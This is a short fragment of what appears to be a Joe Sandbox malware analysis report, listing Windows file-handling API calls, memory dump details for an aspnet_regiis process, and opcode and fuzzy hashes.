                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160D9
                                                                                                                                                                                • Part of subcall function 02A15FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 02A16229
                                                                                                                                                                                • Part of subcall function 02A15FD1: DeleteFileA.KERNEL32(?), ref: 02A1629D
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindNextFileA.KERNEL32(?,?), ref: 02A162FF
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindClose.KERNEL32(?), ref: 02A16313
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2104210347-0
                                                                                                                                                                              • Opcode ID: 0cff7d271fd0fd0720fb830a7a749170aa714dc0e7dcdbb06b52dbfca6d5807c
                                                                                                                                                                              • Instruction ID: 8aa2221a50c750d734597bc302443187cea484c568e01ac87b5f15c4458b3c53
                                                                                                                                                                              • Opcode Fuzzy Hash: 0cff7d271fd0fd0720fb830a7a749170aa714dc0e7dcdbb06b52dbfca6d5807c
                                                                                                                                                                              • Instruction Fuzzy Hash: 97219235D8022CAFDB50EF60DC45AD9B7B9EB14300F4045A5B649A3240EF70DBD48F81